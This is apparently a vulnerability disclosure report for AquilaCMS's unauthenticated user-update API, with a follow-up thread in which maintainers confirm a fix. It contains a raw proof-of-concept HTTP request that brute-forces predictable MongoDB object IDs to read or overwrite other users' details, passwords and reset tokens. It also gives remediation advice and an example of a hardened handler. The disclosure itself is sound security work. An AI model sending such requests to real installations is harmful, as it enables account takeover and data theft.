Incorrect Use of Privileged APIs in aquilacms/aquilacms

Valid

Reported on

Aug 1st 2021


✍️ Description

An unauthenticated API function allows any user to change or view another user's first name, last name, password, and address information. The leaked activateAccountToken and resetPassToken values can also be viewed.

🕵️‍♂️ Proof of Concept

The attacker can guess the correct MongoDB object ID: it is not protected and is leaked during registration. Once the attacker has obtained one valid object ID, the linked GitHub repo can be used to generate other users' object IDs. Using the following API call, the attacker does not need to be logged in and can brute force the _id parameter:

Variables: { IP }, { ID_TO_GUESS }

PUT /api/v2/user HTTP/1.1
Host: { IP }:3010
Content-Length: 245
Accept: application/json, text/plain, */*
lang: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://{IP}:3010
Referer: http://{IP}:3010/account
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"delivery_address":1,"billing_address":0,"isActiveAccount":false,"_id":" { ID_TO_GUESS }","civility":1,"lastname":"whatever20","firstname":"whatever","email":"admin2@admin2.aaa","preferredLanguage":"en","fullname":"whatever whatever10"}

Response:

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
Set-Cookie: cookie_notice=false; Path=/; Expires=Mon, 01 Nov 2021 22:16:10 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 1037
ETag: W/"40d-F8j15BnKHmYafwqqrsJh8golXDg"
Date: Sun, 01 Aug 2021 22:16:11 GMT
Connection: close


{"code":"USER_UPDATE_SUCCESS",
...
....

💥 Impact

An attacker can obtain all information about any user, leaking addresses and tokens, and can also overwrite this information, including changing another user's password. Total account compromise is possible through this one API call.

🩹 Remediation

Do not use the MongoDB object ID as the identifier for user accounts; instead use a randomized 32-byte string or, better, UUIDs. Ensure that users calling the API are authenticated!
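As an added illustration of the remediation (not AquilaCMS code), the handler below models the reported PUT /api/v2/user endpoint as a plain function in its vulnerable shape beside a hardened one that takes the identity from an authenticated session, rejects a client-supplied _id that does not match it, limits writes to a whitelist and strips tokens from the response. The user store, object IDs and token values are constructed sample data, and req.user stands in for whatever an authentication middleware would populate.

```javascript
// Added example (not AquilaCMS code): an Express-style PUT /api/v2/user
// handler modelled as a plain function so it runs without the framework.
// The store, ids and tokens below are constructed sample data.
const users = new Map([
  ['61069a3f3e4e1e0012345678', { firstname: 'Alice', lastname: 'Adams',
    email: 'alice@example.test', resetPassToken: 'reset-alice' }],
  ['61069a3f3e4e1e0012345679', { firstname: 'Bob', lastname: 'Brown',
    email: 'bob@example.test', resetPassToken: 'reset-bob' }],
]);

// Vulnerable shape: the record to update is chosen by the _id in the request
// body, nothing checks who is calling, and the whole record (tokens included)
// is echoed back, which is the behaviour the report describes.
function updateUserVulnerable(req) {
  const target = users.get(req.body._id);
  if (!target) return { status: 404, body: { code: 'USER_NOT_FOUND' } };
  Object.assign(target, req.body);
  return { status: 200, body: { code: 'USER_UPDATE_SUCCESS', data: target } };
}

// Hardened shape: identity comes from the authenticated session (req.user,
// assumed to be set by an auth middleware), the body may only touch
// whitelisted fields, and secrets such as reset tokens are never returned.
const UPDATABLE = ['civility', 'firstname', 'lastname', 'preferredLanguage',
                   'delivery_address', 'billing_address'];
const RETURNABLE = ['civility', 'firstname', 'lastname', 'email',
                    'preferredLanguage'];

function updateUserHardened(req) {
  if (!req.user) return { status: 401, body: { code: 'UNAUTHENTICATED' } };
  const id = req.user._id;
  // A client-supplied _id is never used to pick the record; if it is present
  // and does not match the session, refuse rather than silently ignore it.
  if (req.body._id !== undefined && req.body._id !== id) {
    return { status: 403, body: { code: 'FORBIDDEN' } };
  }
  const target = users.get(id);
  if (!target) return { status: 404, body: { code: 'USER_NOT_FOUND' } };
  for (const k of UPDATABLE) if (k in req.body) target[k] = req.body[k];
  const data = { _id: id };
  for (const k of RETURNABLE) if (k in target) data[k] = target[k];
  return { status: 200, body: { code: 'USER_UPDATE_SUCCESS', data } };
}
```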

📍 Location

users.js#L86

📝 References

https://github.com/andresriancho/mongo-objectid-predict

SmashSnacks modified the report
10 months ago
SmashSnacks
10 months ago

Researcher


@admin, how long do we wait?

Jamie Slome
10 months ago

Admin


Great job on your disclosure!

As you can see, we have made contact with the maintainer via a GitHub Issue and are waiting to hear back from them (i.e. to create a SECURITY.md) so that we can share a magic link with them where they can validate or invalidate this disclosure.

We have contacted a member of the aquilacms team and are waiting to hear back 10 months ago
Z-Old
10 months ago

Admin


Hey SmashSnacks, the maintainers got back to us by email, asking us to fill out a form. I've gone and done that for you, so we're just waiting for their response now. Good job!

SmashSnacks modified the report
10 months ago
aquilacms/aquilacms maintainer validated this vulnerability 9 months ago
SmashSnacks has been awarded the disclosure bounty
The fix bounty is now up for grabs
SmashSnacks
9 months ago

Researcher


@admin, now that this is validated, is it possible to submit for CVE?

aquilacms/aquilacms maintainer
9 months ago

Thanks for this "disclosure bounty". We'll fix this in the next days

Jamie Slome
9 months ago

Admin


@SmashSnacks - we are currently building out our automated CVE system. Once this is live, it will back assign for all applicable vulnerabilities.

SmashSnacks
7 months ago

Researcher


has this been patched?

aquilacms/aquilacms maintainer
18 days ago

Yes ! https://github.com/AquilaCMS/AquilaCMS/pull/164

aquilacms/aquilacms maintainer
18 days ago

But I cannot mark as fixed (huntr bug)

Jamie Slome
18 days ago

Admin


@maintainer - could you please resolve the report by marking the report as fixed?

You can do this by clicking Resolve below 👍

Jamie Slome
18 days ago

Admin


What is the issue you are seeing when trying to mark it as fixed?

Jamie Slome
18 days ago

Admin


Can you confirm which version the patch has been applied to? I can then help you mark the report as fixed 👍

Jamie Slome confirmed that a fix has been merged on 78ae4f 18 days ago
The fix bounty has been dropped
aquilacms/aquilacms maintainer gave praise 17 days ago
Hashes : 78ae4fec858b07540cb0f8bfb1e3169af38168ad b048f06cc57c633f69bc74fbdecb9a6ecaf71037 v 1.205.04
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1